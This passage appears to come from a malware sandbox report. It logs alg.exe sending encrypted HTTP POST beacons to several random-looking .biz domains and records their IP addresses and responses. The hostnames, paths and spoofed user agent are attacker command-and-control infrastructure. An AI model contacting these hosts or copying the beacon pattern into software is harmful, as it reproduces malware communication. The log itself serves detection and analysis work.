                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:31.516048908 CET778OUTData Raw: c4 89 ef c8 8b 0c 1e 56 fe 02 00 00 5a 4d 30 87 ce 42 75 0a bd 1a 26 cf ae af a3 43 3a 94 da 39 24 f7 57 f7 d1 19 71 a0 71 e7 46 c2 b1 29 38 88 0f 83 ed da 4f a7 53 8a e8 e8 f9 cf 00 75 5a 79 55 67 24 36 a5 b7 3a 5d b8 18 72 26 b4 db 68 f0 dd f2
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: VZM0Bu&C:9$WqqF)8OSuZyUg$6:]r&hkZ4^%Le!8O\vt;~% W\81>@~8M^]H"L8ZC^4A/HLbZ.&DQ
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:32.282036066 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:32 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:32.336641073 CET350OUTPOST /wheatfeoc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:32.336719990 CET778OUTData Raw: 38 a8 7b 4f df 38 81 5b fe 02 00 00 d7 4a 84 74 af a2 19 df 8b 16 24 8b f1 a7 00 26 7b 23 c9 3a 4e 14 35 0f 30 d3 39 68 b8 f3 30 9d 21 45 ac 61 c3 66 41 8e 51 14 ab f6 ab ef d9 4e 0a d6 08 67 d9 52 24 2b 3d 67 0f 78 2e ec 90 5b 19 38 fa f3 49 c4
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 8{O8[Jt$&{#:N509h0!EafAQNgR$+=gx.[8IQhw~#Bd' 1RFjPxaGz7Ebz~|w}8|,csI4N2]+Y;0k(,TaYG!]8C3T_Nt!>\lh
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:32.558386087 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:32 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        46192.168.2.105002554.244.188.177807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:32.674824953 CET347OUTPOST /ac HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: oshhkdluh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:32.674865961 CET778OUTData Raw: b0 78 88 4d 91 bb 4e 92 fe 02 00 00 d3 c8 e2 2a 97 04 e0 1f 75 96 68 6f b4 ed 69 25 59 6a c7 93 b7 75 1d 73 ae 47 a5 14 7e b2 9b f5 f0 a8 3e 04 af f0 3d 47 0b 51 0a 44 96 0b 06 2b 3a 22 2f 78 05 01 9b c4 79 a9 58 55 6c 05 c9 bd a2 6b f2 30 eb 25
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: xMN*uhoi%YjusG~>=GQD+:"/xyXUlk0%(. 66`_O6= HY0L,rsjTv^cUUs9;Dxn3\A+WgFf;5;:)NHA97OZjM^
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:33.512067080 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:33 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=3835a38075a700ddb900c8ce503420dd|155.94.241.187|1731920313|1731920313|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        47192.168.2.1050026208.100.26.245807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:33.707196951 CET354OUTPOST /ltpabackndy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:33.707216978 CET778OUTData Raw: f1 9d 53 73 f8 ab f9 4d fe 02 00 00 fe f2 6a 7d 7a e5 25 86 27 d5 6e 56 d0 9e 4f 2f eb b4 02 3b 56 0f 62 93 0f 04 92 90 91 b4 d6 38 48 bc 2f 5a 4a 84 83 1c 98 29 81 e9 67 c7 17 51 69 31 91 a9 df 36 ad c5 63 ed ea e4 bb 0a bd 56 5f 90 d2 30 1f 8d
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: SsMj}z%'nVO/;Vb8H/ZJ)gQi16cV_0RTA8Zq|[:=s]P8EgrfDU_}=aEh=l\1sO^_P"m5i2c1.Lu:k@Jlt9zyRz bJPZk0q
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:34.344518900 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:34.404469013 CET349OUTPOST /ohnuij HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:34.404491901 CET778OUTData Raw: 65 f0 1c 65 91 a6 8e 90 fe 02 00 00 aa 18 cc cf b6 83 3a 6b 6d 8d 9f 4c 50 5c 99 8d a7 8d fa 5b 35 34 92 88 03 26 7d fb b3 93 c2 72 b2 7b 7c 0f 43 05 c2 c9 3b be 6b 77 bd c8 4f fd b3 76 24 47 52 0b d6 8a 87 80 53 fc 06 87 70 5c 5e 1e 30 87 30 c5
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ee:kmLP\[54&}r{|C;kwOv$GRSp\^00}hn"3+1VC4[ /NSy>%]bm#%\a38Q9AVVN!KSv)DfajkzD.TC:AT!g3OF7?Y/RmV,6ghCU$nK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:34.554042101 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        48192.168.2.105002734.211.97.45807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:34.777157068 CET345OUTPOST /srxp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: jpskm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:34.777190924 CET778OUTData Raw: 12 9f ae 8e 33 28 8e bb fe 02 00 00 ed c7 9d af 58 8a b1 32 29 05 a9 7e d6 b7 62 d7 c8 44 ba 9e e7 c4 a2 ea f5 f6 74 25 8e bc c6 db 28 ee 68 cf dc 61 7b 7d f1 21 49 00 5d 9a de fc 70 ce a0 48 9a e9 32 60 2a 50 ee c2 89 1c 79 fd 27 05 29 35 67 67
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 3(X2)~bDt%(ha{}!I]pH2`*Py')5gghuK5xnx1xY.,%gzlir+|V~P*u>fnMhtyG+d9{(zaYJ)t'[+ed/]WVj6q<s
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:35.571043968 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:35 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=d9f07461e2aab7053cf4b91356108add|155.94.241.187|1731920315|1731920315|0|1|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        49192.168.2.105002854.244.188.177807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:35.915338993 CET353OUTPOST /cwpmdhyer HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: lrxdmhrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:35.915338993 CET778OUTData Raw: 97 e5 07 f3 ea c3 2b 89 fe 02 00 00 38 8c c3 e2 42 a6 ac b4 64 b8 03 75 e1 28 49 e3 ad cf 1a fe 26 07 a1 48 bd 6c 9e fc b1 e1 57 d7 69 c6 65 15 af 1b 4d ff 1e bf 38 cc ac 85 d4 1a fa fa 5b 7d 84 f8 90 be fc 73 cf 1d d9 16 b1 d7 1e 58 9f 6b 14 f7
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: +8Bdu(I&HlWieM8[}sXkOp;loY9LYpJbZPH\m:iCx.%rSj@8x]eLLNL+MPfGaSPs%*7l/O5`/sh17x<r
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:36.749867916 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:36 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=6b773b1fa7a00b348f173bab85980e2f|155.94.241.187|1731920316|1731920316|0|1|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        50192.168.2.105002918.141.10.107807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:37.161514044 CET351OUTPOST /txxefbew HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: wllvnzb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:37.161537886 CET778OUTData Raw: d5 c0 ca 78 7c fa d0 8e fe 02 00 00 e4 ee 36 09 e7 38 6b ed d7 5c 52 bb e1 32 1a 12 17 40 18 1d f7 ac 8e c3 9a 48 d0 39 21 1c ae 56 fe 3a 6a b8 0c 9e b7 a3 8c 26 9a 9a 23 8c f9 76 8c ec 46 c4 bd 76 d6 5a 8d 8c 50 ed dd e8 6a 49 42 de 8c 26 45 d8
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: x|68k\R2@H9!V:j&#vFvZPjIB&E9>FP%XnBPZa6Lu*ZG:CW[YVM1f#& )|_aTI=#,pPIG+YMHy~BNZl}_Y(>UW:E
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:38.620486975 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:38 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=985eb775d1ab5204848c993cd2909834|155.94.241.187|1731920318|1731920318|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        51192.168.2.105003018.208.156.248807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:38.930005074 CET345OUTPOST /vwka HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gnqgo.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:38.930128098 CET778OUTData Raw: a4 61 3e 9b 14 ab d5 b8 fe 02 00 00 1f 12 ea 66 89 31 23 ab 62 e9 59 ed 29 32 13 8d 57 8e 75 c3 7d c4 65 1a 17 2c 4b 50 eb 89 fc 00 fa 56 f0 f0 d4 2a 78 5f 1c 64 0c de df 32 f8 37 3e 54 e9 82 49 97 8c 9c f3 6d 3c c2 2d 1e d2 ca b4 27 63 9d de 62
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: a>f1#bY)2Wu}e,KPV*x_d27>TIm<-'cb7$k:XF*R~mTx@;;5ezYU$^mNyZW^9XiTRcoSI@Y8f?+mXG!GJpj</}Y,g)&^DHAxf^}
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:39.592175007 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:39 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=d9b3d5d3f53d4e5b72de06531f9d06d8|155.94.241.187|1731920319|1731920319|0|1|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        52192.168.2.105003182.112.184.19780
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:39.189702034 CET356OUTPOST /awclfrtxgvu HTTP/1.1
